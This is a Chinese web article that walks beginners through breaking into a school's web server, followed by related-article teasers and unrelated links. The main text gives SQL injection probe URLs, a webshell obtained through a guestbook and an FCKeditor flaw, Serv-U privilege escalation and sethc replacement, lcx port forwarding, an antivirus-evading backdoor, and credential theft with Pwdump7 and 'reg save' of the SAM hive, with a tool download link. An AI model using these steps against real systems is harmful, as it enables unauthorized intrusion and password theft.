怎么入侵某某学校的网站服务器?网站服务器入侵过程
在网上闲的蛋疼无聊百度搜索“蛋疼”二字看到一篇文章《蛋疼的中国黑客》虽然你的出发点是好的但是你侮辱了他们虽然我不是黑客但是我要消灭你…….
比较详细适合新手大牛路过…
说做就做,日之
独立ip服务器没有挂其他站点
Ping ip返回值判断对方机器是W2003服务器
在收集一下端口开了21 135 139
ftp XXX返回
220 Serv-U FTP Server v6.4 for WinSock ready..
装了SEVER u
经搜集确定服务器为win2003+asp+iis6.0+mssql
打开目标3389没反应学校网站应该是放在内网
一、获取webshell
首先从网站的asp程序入手
http://www.xxxxx.com/news.asp?id=21&sc=1%20and%201=1(and注入1=1页面正常1=2页面错误有注入)
返回到了首页,再来
http://www.xxxxx.com/news.asp?id=21&sc=1%20or%201=1(or注入如果or1=1返回错误即有注入返回正确页面则无注入)
又返回到了首页看来这个网站的管理员还算有点安全知识
不死心继续观察利用搜索引擎载入到啊D扫扫site:xxxx.com asp?id=
http://www.xxxxx.com/show_news.asp?id=418’
随手一个单引号
YES出现注入猜解猜解
激动的时候到了MD5 NOT FOUND暴力破解吧没兴趣
继续回到主站看到了一个留言板抱着试试的心态
抓包提交后既然有数据库地址
Ok小失误成功得到地址
Fckeditor漏洞也可以利用
这里就不做演示了
二、服务器提权
扫描了下端口
本地打开21,1433,3389等端口,对外只开放了80端口
试着看下可写目录极品出来了
这就好办了SU提权OK替换sethc成功加入管理
内网进不去那我们就把它转发出来用到lcx端口转发
使用Lcx进行内网端口转发图文讲解
上传lcx.exe
设置好之后成功进入服务器
在配置个马儿反弹成功上线这个马儿过内杀软全过瑞星就直接pass吧
三、内网渗透
既然网站的安全这么差我就直接抓hash吧
使用Pwdump7提取系统密码hash值
工具临时下载地址:http://www.hackline.net/a/soft/cracking/2010/0412/3312.html
杀毒软件可能会报毒。请自行检测。
使用说明:
Pwdump7可以在CMD下提取出系统中的用户的密码hash (包括LM和NTLM),当然必须要有系统权限.提取出了HASH,再用ophcrack破出明文密码,对进一步渗透是有很大帮助的,经我测试,在XP下是可以成功提取出来的.这个工具需要一个DLL文件支持,压缩包中带的,只需放到一个文件夹中即可,用法很简单,直接输入
D:\>PwDump7.exe
Pwdump v7.1 - raw password extractor
Author: Andres Tarasco Acuna
url: http://www.514.es
administrator:500:25FC25A0CA659E57ACEDB07452AB7A8E:6C1B3BE8D28CD3E7AB63122C8A572DDF:::
guest:501:0E175C3EFF8EED1652440321FCD91E4E:2850991451071A5B7A95F2977D4AAEF0:::
atarasco:1001:45C6AEEDC857A06DC595236F8F5FECAA:D0253497114C1B4CC337210F4580A716:::
用法:
pwdump7.exe (Dump system passwords)
pwdump7.exe -s
pwdump7.exe -d
pwdump7.exe -h (Show this help)
-s 是从一个sam文件中提取hash,这个文件在%systemroot%\config\sam,这里.
-d 是把一个文件复制到另一个位置,D:\>PwDump7.exe -d c:\pagefile.sys pagefile.dmp 从这个例子中可以看出,他的特别之处在于,可以把进程正在占用的文件复制成功.
解决提示libeay32.dll找不到或缺少的问题
拷贝libeay32.dll到windows/system32下即可
在这里我给大家一个简单的方法老外抓hash的方法
reg save hklm\system system
reg save hklm\sam sam
操作成功完成后自己就拿工具去破吧
感谢老大mr cool给我的工具
他的网站http://www.blackbap.org/
我这个内网主机只有两台而且没开3389
我就不继续渗透了
web安全检测工具:skipfish的优点和安装方法
Skipfish是由google出品的一款自动化的网络安全扫描工具,该工具可以安装在linux、freebsd、MacOS X系统和windows(cygwin)。谷歌工程师Michal Zalewski称,尽管Skipfish与Nikto和Nessus等其他开源扫描工具有相
详情2018-01-23 17:34:18责编:llp 来源:驱动管家什么是rootKit?怎么用rootKit进行管理员高级隐藏?
Rootkit是一个或者多个用于隐藏、控制一台计算机的工具包,该技术被越来越多地应用于一些恶意软件中。在基于Windows的系统中Rootkit更多地用于隐藏程序或进程,系统被注入Rootkit后就可以在不为用户察觉的情况下
详情2018-01-27 17:13:03责编:llp 来源:驱动管家隐藏文件的四种方法 怎么隐藏文件?
下面小编给大家整理了四条有关隐藏文件的方法,以供大家参考。第一种方法,也是最简单的:修改文件目录的属性此法最简单,只要选中欲隐藏的目录,单击鼠标右键,选择“属性”,在“隐藏”属性复选框中打个“&radi
详情2018-01-19 09:35:07责编:llp 来源:驱动管家计算机中毒怎么处理?计算机中毒的紧急处理措施
常在河边走,哪能不湿鞋呢?互联网上各种病毒在不停的流窜,作为连接在网络上的电脑,尽管我们已经做了各种防范,但还是不能避免,稍不留神就会中招。而现在我们学到的多是如何防范电脑中毒的知识,但是对于已经
详情2018-01-16 12:21:47责编:llp 来源:驱动管家什么是白帽黑客?网络安全25道问答
1)什么是白帽黑客?白帽黑客是指当某个人被允许在企业产品所有者允许的情况下攻击系统,以便在系统中发现弱点,然后修复bug。2)IP地址和Mac地址有什么区别?IP地址:分配每个设备的IP地址,使设备位于网络上。M
详情2018-01-09 14:02:13责编:llp 来源:驱动管家传奇服务器与洞网论坛在同一服务器上会出现漏洞
漏洞起因:很多白菜级的站长和管理员,把 "洞网论坛 "与传奇服务器同时架设到同一台服务器上!1 详细步骤:它时至今日,仍然有很多站长不知道去修改数据库的路径,所以,对于这招攻击很灵,特别是动网的,默认为dvbbs7
详情2018-01-27 14:58:20责编:llp 来源:驱动管家雷客图asp站长助手增加了查杀功能 木马如何躲避查杀?
到Lake2网站上下了1 5的源代码,发现这个版本的确改进了不少,又增加了查杀功能:1:查杀通过了Unicode编码的ASP木马2:查杀使用了(Open|Create)TextFile, SaveToFile,Save, set Server,Server (Transfer|Exe
详情2018-01-24 18:05:48责编:llp 来源:驱动管家黑客入侵有哪些方法?黑客入侵的手段
1 1433端口入侵 scanport exe 查有1433的机器 SQLScanPass exe 进行字典暴破(字典是关键)
详情2018-01-06 16:07:26责编:llp 来源:驱动管家社会工程学攻击有哪些方法?社会工程学攻击的方法介绍
转自CB,不同意原文使用的”伎俩”一词 社会工程学也是一门科学,是科学就有科学的方法,帮改之为”方法” 以下是原文:著名黑客Kevin Mitnick在上世纪90年代让“黑客社会工程学”这个术语流行了起来,不过这个简单的
详情2018-02-02 14:29:58责编:llp 来源:驱动管家windows 命令行下的调试工具:ntsd进行远程调试的步骤
这个其实是 NTSD exe 的正常功能,远程调试功能,更多说明自己谷歌搜索,这是一个 windows 命令行下的调试工具,功能十分强大。1 肉鸡上运行:ntsd -server tcp:port=端口 要调试的程序(可以任意,只要存
详情2018-01-24 19:52:05责编:llp 来源:驱动管家
- morphvox pro变声教程是什么?morphvox pro教程图解
- 手机UC浏览器怎么用智能小说模式?手机UC浏览器小说模式调整
- 索尼ps2系列游戏主机的性能怎么样?索尼ps2主机的推荐
- 索尼w350这款女性专属相机的评测
- 一个办法快速学会使用家用光纤快速连接器
- 不知道怎么安装cos操作系统的可以看这里
- 为什么电脑老是自动重启?从两个方面教你排查并解决问题
- 不需要借助第三方隐藏软件修改,索尼z1 l39h可以彻底隐藏虚拟键
- oppo手机壁纸怎么换?oppo手机壁纸如何设置?
- 网络上流行的文件捆绑有哪些方式?winrar的捆绑技术实现操作过程
- 驱动器还能自己制作?教你怎么在win7系统中创建简易驱动器
- connectify这款软件的功能是什么?connectify怎么用?
- 有道云笔记怎么快捷切换笔记?有道云笔记有哪些功能?
- 尼康d700单反相机怎么使用?尼康d700的操作方法介绍
- 关于尼康相机的镜头你知道多少?尼康镜头大全介绍
- 国产手机的强势崛起?LG正式承认退出中国市场
- 【游戏攻略】绝地求生喷子伤害及特征 喷子应该怎么选择?
- 怎么关闭win10系统补丁的自动更新功能
- linux系统常用到ping命令是什么?ping命令详解
- 荣耀4a怎么样?为你详细评估荣耀4a是否值得购买?